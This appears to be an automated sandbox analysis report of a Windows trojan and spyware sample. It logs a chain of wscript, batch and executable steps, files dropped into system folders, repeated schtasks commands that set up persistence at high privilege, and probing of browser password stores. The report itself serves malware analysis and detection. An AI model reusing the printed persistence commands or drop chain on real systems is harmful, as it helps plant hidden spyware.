                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008A6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_008A6FAA
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Windows\apppatch\8e809f57164876Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008A848E0_2_008A848E
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008B40880_2_008B4088
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008B00B70_2_008B00B7
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008A40FE0_2_008A40FE
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008C51C90_2_008C51C9
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008B71530_2_008B7153
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008B62CA0_2_008B62CA
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008A32F70_2_008A32F7
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008B43BF0_2_008B43BF
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008AC4260_2_008AC426
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008CD4400_2_008CD440
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008AF4610_2_008AF461
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008B77EF0_2_008B77EF
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008CD8EE0_2_008CD8EE
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008A286B0_2_008A286B
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008AE9B70_2_008AE9B7
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008D19F40_2_008D19F4
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008B6CDC0_2_008B6CDC
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008B3E0B0_2_008B3E0B
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008C4F9A0_2_008C4F9A
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008AEFE20_2_008AEFE2
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 5_2_00007FFD9BAC0D745_2_00007FFD9BAC0D74
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 5_2_00007FFD9BEB48805_2_00007FFD9BEB4880
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 5_2_00007FFD9BEBAF415_2_00007FFD9BEBAF41
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 19_2_00007FFD9BAA0D7419_2_00007FFD9BAA0D74
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 19_2_00007FFD9BAB056619_2_00007FFD9BAB0566
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 19_2_00007FFD9BAD200019_2_00007FFD9BAD2000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BB0200021_2_00007FFD9BB02000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BAD0D7421_2_00007FFD9BAD0D74
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BAE056621_2_00007FFD9BAE0566
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BC3185321_2_00007FFD9BC31853
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BEC488021_2_00007FFD9BEC4880
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BECBBC521_2_00007FFD9BECBBC5
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 37_2_00007FFD9BAD200037_2_00007FFD9BAD2000
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 37_2_00007FFD9BAB056637_2_00007FFD9BAB0566
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 37_2_00007FFD9BAA0D7437_2_00007FFD9BAA0D74
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 38_2_00007FFD9BAD0D7438_2_00007FFD9BAD0D74
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 39_2_00007FFD9BAA0D7439_2_00007FFD9BAA0D74
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 42_2_00007FFD9BAB056642_2_00007FFD9BAB0566
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 42_2_00007FFD9BAD200042_2_00007FFD9BAD2000
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 43_2_00007FFD9BA90D7443_2_00007FFD9BA90D74
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 45_2_00007FFD9BAC056645_2_00007FFD9BAC0566
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 45_2_00007FFD9BAE200045_2_00007FFD9BAE2000
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 45_2_00007FFD9BAB0D7445_2_00007FFD9BAB0D74
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AjJOuhvp.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: String function: 008BF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: String function: 008BEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: String function: 008BEB78 appears 39 times
                                    Source: 544WP3NHaP.exe, 00000000.00000003.1655721300.0000000002B74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 544WP3NHaP.exe
                                    Source: 544WP3NHaP.exe, 00000000.00000002.1657019951.0000000002B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 544WP3NHaP.exe
                                    Source: 544WP3NHaP.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 544WP3NHaP.exe
                                    Source: 544WP3NHaP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: bridgeportDhcpcommon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe1.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe2.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SearchApp.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@48/46@1/1
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008A6C74 GetLastError,FormatMessageW,0_2_008A6C74
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_008BA6C2
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\qeNySdhc.logJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMutant created: NULL
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ifozT5IhpWQVKWPrvZtc
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\AppData\Local\Temp\55jg4js0Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" "
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCommand line argument: sfxname0_2_008BDF1E
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCommand line argument: sfxstime0_2_008BDF1E
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCommand line argument: STARTDLG0_2_008BDF1E
                                    Source: 544WP3NHaP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 544WP3NHaP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: Hy21lrSobx.21.dr, x5Q8jyiXXr.21.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: 544WP3NHaP.exeVirustotal: Detection: 55%
                                    Source: 544WP3NHaP.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeFile read: C:\Users\user\Desktop\544WP3NHaP.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\544WP3NHaP.exe "C:\Users\user\Desktop\544WP3NHaP.exe"
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES26F0.tmp" "c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 13 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 8 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeportDhcpcommon" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                    Source: unknownProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: unknownProcess created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: unknownProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
                                    Source: unknownProcess created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" Jump to behavior
